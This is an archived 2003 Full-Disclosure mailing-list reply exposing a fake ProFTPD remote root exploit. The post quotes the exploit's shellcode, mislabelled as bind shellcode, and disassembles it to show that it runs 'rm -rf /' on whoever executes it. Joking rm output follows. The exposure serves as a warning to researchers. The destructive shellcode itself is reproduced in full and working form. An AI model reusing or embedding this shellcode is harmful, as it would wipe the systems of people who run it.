[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-Disclosure] ProFTPD-1.2.9rc2 localhost delete

To: full-disclosure@lists.netsys.com
Subject: Re: [Full-Disclosure] ProFTPD-1.2.9rc2 localhost delete
From: dilema <dilema@dtors.net>
Date: Fri, 24 Oct 2003 11:48:07 -0500

Yeah umm thats some sexy shellcode there.

> 
> /* x86 bind shellcode */
> char sc[]=
> "\x31\xc0\x50\x68\x66\x20\x2f\x58\x68\x6d\x20\x2d\x72\x68\x2d"
> "\x63\x58\x72\x68\x41\x41\x41\x41\x68\x41\x41\x41\x41\x68\x41"
> "\x41\x41\x41\x68\x41\x41\x41\x41\x68\x2f\x73\x68\x43\x68\x2f"
> "\x62\x69\x6e\x31\xc0\x88\x44\x24\x07\x88\x44\x24\x1a\x88\x44"
> "\x24\x23\x89\x64\x24\x08\x31\xdb\x8d\x5c\x24\x18\x89\x5c\x24"
> "\x0c\x31\xdb\x8d\x5c\x24\x1b\x89\x5c\x24\x10\x89\x44\x24\x14"
> "\x31\xdb\x89\xe3\x8d\x4c\x24\x08\x31\xd2\x8d\x54\x24\x14\xb0"
> "\x0b\xcd\x80\x31\xdb\x31\xc0\x40\xcd\x80";

00000002  50                push eax
00000003  6866202F58        push dword 0x582f2066
00000008  686D202D72        push dword 0x722d206d
0000000D  682D635872        push dword 0x7258632d
00000012  6841414141        push dword 0x41414141
00000017  6841414141        push dword 0x41414141
0000001C  6841414141        push dword 0x41414141
00000021  6841414141        push dword 0x41414141
00000026  682F736843        push dword 0x4368732f
0000002B  682F62696E        push dword 0x6e69622f
00000030  31C0              xor eax,eax
00000032  88442407          mov [esp+0x7],al
00000036  8844241A          mov [esp+0x1a],al
0000003A  88442423          mov [esp+0x23],al
0000003E  89642408          mov [esp+0x8],esp
00000042  31DB              xor ebx,ebx
00000044  8D5C2418          lea ebx,[esp+0x18]
00000048  895C240C          mov [esp+0xc],ebx
0000004C  31DB              xor ebx,ebx
0000004E  8D5C241B          lea ebx,[esp+0x1b]
00000052  895C2410          mov [esp+0x10],ebx
00000056  89442414          mov [esp+0x14],eax
0000005A  31DB              xor ebx,ebx
0000005C  89E3              mov ebx,esp
0000005E  8D4C2408          lea ecx,[esp+0x8]
00000062  31D2              xor edx,edx
00000064  8D542414          lea edx,[esp+0x14]
00000068  B00B              mov al,0xb
0000006A  CD80              int 0x80
0000006C  31DB              xor ebx,ebx
0000006E  31C0              xor eax,eax
00000071  CD80              int 0x80

## Super Seczy Shellcode ##

rm: cannot remove `//bin': Permission denied  
rm: cannot remove `//dev': Permission denied  
rm: cannot remove `//etc': Permission denied
rm: cannot remove `//lib': Permission denied
rm: cannot remove `//mnt': Permission denied 
rm: cannot remove `//opt': Permission denied
rm: cannot remove `//tmp': Permission denied  
rm: cannot remove `//sys': Permission denied
rm: cannot remove `//var': Permission denied
rm: cannot remove `//usr': Permission denied
rm: cannot remove `//boot': Permission denied
rm: cannot remove `//home': Permission denied
rm: cannot remove `//proc': Permission denied
rm: cannot remove `//sbin': Permission denied
rm: cannot remove `//root': Permission denied
rm: cannot remove `//share': Permission denied
rm: cannot remove `//.bash_history': Permission denied
rm: cannot remove `//.xauthKbxfnN': Permission denied
rm: cannot remove `//.irssi': Permission denied
-- 
dilema <dilema@dtors.net>

Attachment: signature.asc
Description: This is a digitally signed message part

References:
- [Full-Disclosure] ProFTPD-1.2.9rc2 remote root exploit
  - From: "Jean-Kevin Grosnakeur" <fufeur@hotmail.com>
- Re: [Full-Disclosure] ProFTPD-1.2.9rc2 localhost delete
  - From: kang <kang@insecure.ws>

Prev by Date: RE: [inbox] Re: [Full-Disclosure] RE: Linux (in)security
Next by Date: Re: [Full-Disclosure] ProFTPD-1.2.9rc2 remote root exploit
Previous by thread: Re: [Full-Disclosure] ProFTPD-1.2.9rc2 localhost delete
Next by thread: Re: [Full-Disclosure] ProFTPD-1.2.9rc2 remote root exploit
Index(es):
- Date
- Thread